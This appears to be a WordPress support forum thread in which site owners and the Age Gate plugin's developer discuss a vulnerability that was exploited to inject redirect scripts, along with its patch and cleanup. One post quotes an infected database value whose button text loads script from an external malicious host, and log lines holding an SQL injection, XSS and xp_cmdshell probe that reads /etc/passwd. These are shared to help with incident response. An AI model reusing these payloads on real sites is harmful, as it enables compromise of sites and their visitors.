Age Gate hacked on multiple sites, multiple servers

Hi @lmndk24,

That’s concerning. Not something I’ve had reported before.

Do you have any other info? At what point is it happening?

Thanks
Phil

I can send you my files: https://we.tl/t-ZPO3iuWs8j

But – i just double checked on “I confirmed this on multiple other domains shown on this forum. ” – that was just a cache, i can’t confirm this.

But, the “hack” was gone after i debugged purevodka.dk and puregin.dk, so there has to be something, though i don’t know what it is, and i can’t find it.
Both purevodka.dk and puregin.dk have the same setup – but on different servers.

Can you rename or hide this thread? I don’t wanna cause any harm, if this seems to be false.

Can confirm this was the cause here too.

Someone had overwritten the Yes/No button text (in mine) to implement a script that would auto-redirect the site to a 3rd party spam site.

Once I cleared that out (and had to reset all my styling because that was gone too), I believe it’s fixed.

I believe that your XSS update for imports in 2.17.1 may have fixed it, but I can’t say for certain. All I know is the text for the headline, custom CSS, and Yes/No button text had all changed. The yes/no buttons were implementing <script src=”garbage JS file here”></script> and causing a redirect.

Hi @midwestdev / @lmndk24

Can confirm there’s nothing compromised in the actual codebase sent by @lmndk24, so I tend to think that the issue is probably related to that which was patch in 2.17.1. That patch wouldn’t have retroactively fixed any affected sites though, so I’ll look at that, which is admittedly not hugely helpful to you guys

The issue was flagged by some security people so I’m relatively confident there shouldn’t be anything to make it happen again.

Hi All, I have quite a few sites with malware as well, and I was thinking age-gate may be the issue since it’s on all the sites where I’m having issues right now.

Has there been anything discovered at all?

I’m not sure how to debug or track, but I can if someone can give me some insights on how to do it.

Thanks all, talk soon

@soloant,

Apologies for the problems, an issue was raised which was patched as soon as was possible in 2.17.1.

If you resave the settings on your site it should resolve any issues as long as you also clear any caches.

The root cause has been patched and some further patches a coming.

Thanks
Phil

Hi @philsbury, checking now, I’ll report back anything I find.

Thank you.

Hi, I tested on one site but like it was mentioned above the styling/messaging is all gone now. But I’m not being redirected which is good.

I appreciate the quick response.

Thank you!

If anyone else finds this thread, when updating and resaving all the settings sometimes this was not resetting/updating at all so I had to clear it manually.

Hoping this might help others too.

I’m on Version 2.18.1 and it appears that the malicious script was added to the Yes / No buttons on the previously insecure version.

Maybe your update has closed the door on future hacks, but it is obviously not retroactively fixing the issue for those that have already been hacked. I’d suggest you release a version that simply overwrites whatever is in the Yes / No buttons to force the malicious script to be removed.

I just happened to visit my client’s site for another reason and discovered the issue. Leaving this as-is without addressing the underlying malicious script is not good for anyone.

Just got notified by an client that the age gate does look different on his website. After quick check, I was redirected to a clickbait site.

I can confirm that the infection happens in the wp_options table in a record with the option_name of wp_age_gate_messages.

Here’s the content of the infected option_value:

a:15:{s:11:"instruction";s:0:"";s:9:"messaging";s:0:"";s:17:"invalid_input_msg";s:22:"Your input was invalid";s:13:"under_age_msg";s:43:"You are not old enough to view this content";s:17:"generic_error_msg";s:35:"An error occurred, please try again";s:16:"remember_me_text";s:11:"Remember me";s:14:"yes_no_message";s:29:"Are you over %s years of age?";s:8:"yes_text";s:70:"Yes<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:7:"no_text";s:69:"No<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:10:"additional";s:0:"";s:11:"button_text";s:6:"Submit";s:14:"cookie_message";s:85:"Your browser does not support cookies, you may experience problems entering this site";s:8:"text_day";s:3:"Day";s:10:"text_month";s:5:"Month";s:9:"text_year";s:4:"Year";}

The Age-Gate version which is currently in use: 2.16.4

I was able to pull out the following activity from the logs which could be a possible attack vector:

46.161.27.0 - - [02/Oct/2021:18:25:13 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

46.161.27.0 - - [02/Oct/2021:18:25:18 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css?AlSV%3D5166%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

46.161.27.0 - - [02/Oct/2021:18:25:19 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

• This reply was modified 3 years ago by kreativrudel.

Hi all,

Just wanted to post an update as to what happened in the plugin and how it’s been addressed.

I was notified of a potential vulnerability within the plugin (I don’t want to go into too many specifics for now, just in case there’s unupgraded users that haven’t been affected).

The flaw(s) had been present for some time and hadn’t been spotted in previous pen tests. I got to work on fixing the issues as soon as I could and the issue was patched in 2.17.1. Unfortunately it seems that the vulnerability became known before I could release the patch.

Following the comment above from @tvideveloper, the 2.18.2 update included two elements to combat sites that had been affected where it will seek out bad entries in the data and if found, revert them to the default setting. This also happens via the cron system which is a little overkill, but just to err on the side of caution. Just a note for anyone unfamiliar with semver, there wasn’t a big gap between these releases but there were enough changes to warrant a minor version increase.

The log examples from @kreativrudel are along the lines for what happens – though those exact examples wouldn’t do anything as they’re posting to an actual CSS file which should be a static asset.

Thanks
Phil

Thank you @philsbury for your diligence in resolving this matter. Appreciate the plugin and the work you do.

Thanks for the update @philsbury

Got a customer who complained about the lost styling on the age verification page. Running Age-gate 2.18.4 but their styling is still broken. How to reset the styling options please? Nothing that I’ve tried worked.

Do you know what did the attacker change please? Just so we can double check manually if it’s. In this particular case the plugin was set to use a dropdown instead of “yes/no” buttons, hopefully this disabled any unwanted redirections. Thanks